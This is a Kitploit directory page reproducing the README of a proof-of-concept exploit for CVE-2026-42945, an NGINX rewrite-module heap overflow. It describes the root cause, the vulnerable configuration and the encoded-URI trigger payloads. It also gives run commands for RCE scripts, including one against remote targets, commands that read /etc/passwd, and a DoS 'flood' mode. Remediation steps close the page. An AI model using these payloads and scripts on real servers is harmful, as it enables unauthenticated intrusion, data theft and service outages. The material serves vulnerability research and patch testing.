Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
nginx-cve-2026-42945-poc — Proof-of-concept exploit for CVE-2026-42945, a critical heap overflow in NGINX rewrite module enabling unauthenticated remote code execution via crafted URI encoding. Includes Docker-based testing environment, ASAN validation, and multiple exploit scripts. | Kitploit
Tools/GitHubGitHub/forxiucn/nginx-cve-2026-42945-poc
Container SecurityDynamic Analysis (Sandboxing)Vulnerability AnalysisExploitationWeb Application ExploitationFuzzingPenetration TestingBinary Exploitation

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHubforxiucn/nginx-cve-2026-42945-poc

nginx-cve-2026-42945-poc

Proof-of-concept exploit for CVE-2026-42945, a critical heap overflow in NGINX rewrite module enabling unauthenticated remote code execution via crafted URI encoding. Includes Docker-based testing environment, ASAN validation, and multiple exploit scripts.

View Repository
1204 months agoNot yet reviewed

CVE-2026-42945 — NGINX Rewrite Module Heap Buffer Overflow → RCE

RCE confirmed successful — via heap overflow + GDB process injection, execute arbitrary commands in NGINX / OpenResty worker processes.

Quick Start

# One-click build NGINX image + execute RCE test
./run.sh nginx

# One-click build OpenResty image + execute RCE test
./run.sh openresty

# Custom command
./run.sh nginx 'cat /etc/passwd'
./run.sh openresty 'whoami'

Vulnerability Overview

AttributeValue
CVE IDCVE-2026-42945
Vulnerability TypeHeap Buffer Overflow → Remote Code Execution (RCE)
Affected Componentngx_http_rewrite_module
Affected VersionsNGINX 0.6.27 ~ 1.30.1, NGINX Plus R32 ~ R36
CVSS ScoreCVSS 9.4 (CRITICAL)
Exploitation ConditionsNo authentication required; RCE requires ptrace privileges (root)

Root Cause

ngx_http_script_complex_value_code() allocates a buffer based on the decoded length of the URI, but ngx_http_script_copy_capture_code() calls ngx_escape_uri() writing based on the encoded length. URL encoding characters expand 3× → heap overflow.

Trigger Conditions

Three conditions must be met simultaneously:

  1. rewrite and set directives in the same location block
  2. The rewrite replacement string contains ?
  3. set references the rewrite's capture variable $1
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # Contains '?'
    set $original_endpoint $1;                     # References $1
}

ASAN Confirmation Stack

#0 ngx_escape_uri                    src/core/ngx_string.c:1663
#1 ngx_http_script_copy_capture_code src/http/ngx_http_script.c:1399
#2 ngx_http_rewrite_handler          src/http/modules/ngx_http_rewrite_module.c:180

Project Structure

.
├── run.sh                          # One-click build + test entry
├── README.md
│
├── scripts/                        # Test & exploit scripts
│   ├── rce.sh                      # Pure Shell RCE (curl + GDB, no Python)
│   ├── exploit_rce.py              # Python RCE (compatible with 2.7/3.x)
│   ├── exploit.py                  # PoC main script (check/exploit/rce/flood)
│   └── exploit_asan.py             # ASAN comprehensive scan
│
├── package/                        # Deployment & orchestration files
│   ├── Dockerfile.rce              # NGINX source build + RCE environment
│   ├── Dockerfile.openresty.rce    # OpenResty source build + RCE environment
│   ├── Dockerfile                  # Base image (Alpine)
│   ├── Dockerfile.asan             # ASAN debug image
│   ├── docker-compose.yml          # Docker orchestration (nginx-rce + openresty-rce)
│   ├── nginx.conf                  # NGINX vulnerable configuration
│   ├── nginx-openresty.conf        # OpenResty vulnerable configuration
│   ├── start_rce.sh                # NGINX RCE container startup script
│   └── start_openresty_rce.sh      # OpenResty RCE container startup script
│
└── src/                            # Source code (for compilation)
    ├── nginx-1.26.3/               # NGINX 1.26.3 source
    ├── nginx-1.26.3.tar.gz
    └── openresty-1.25.3.1.tar.gz   # OpenResty 1.25.3.1 (built-in nginx/1.25.3)

Detailed Usage

Testing Inside Docker Containers

# Shell script (no Python dependency)
docker exec nginx-rce bash /opt/rce.sh 'id'
docker exec nginx-rce bash /opt/rce.sh 'cat /etc/passwd'

# Python script (compatible with 2.7/3.x)
docker exec nginx-rce python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'whoami'

# OpenResty equivalent
docker exec openresty-rce bash /opt/rce.sh 'id'

Exec into Container from Host

docker exec -it nginx-rce bash
# Inside container:
bash /opt/rce.sh 'id'
python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'uname -a'

Testing Remote Targets Directly

# Requires root + ptrace privileges
sudo python3 scripts/exploit_rce.py -t http://target:80 -c 'id'

PoC Main Script (Four Modes)

python3 scripts/exploit.py --target http://localhost:8775 --mode check     # Detect vulnerability
python3 scripts/exploit.py --target http://localhost:8775 --mode exploit   # ASAN heap overflow verification
python3 scripts/exploit.py --target http://localhost:8775 --mode rce       # RCE risk assessment
python3 scripts/exploit.py --target http://localhost:8775 --mode flood     # DoS stress test

Trigger Payloads

PayloadDescriptionResult
/api/%25 × NEncoded %✅ Heap Overflow
/api/%3f × NEncoded ?✅ Heap Overflow
/api/%23 × NEncoded #✅ Heap Overflow
/api/%26 × NEncoded &✅ Heap Overflow

Remediation Recommendations

  1. Upgrade NGINX to 1.30.2+
  2. Temporary mitigation: Avoid rewrite (containing ?) + set (referencing $1) combination
  3. WAF rules: Block excessive %25/%3f/%23/%26 encoded requests
  4. Privilege hardening: echo 1 > /proc/sys/kernel/yama/ptrace_scope

References

  • F5 Advisory K000161019
  • NGINX Source
Download Tool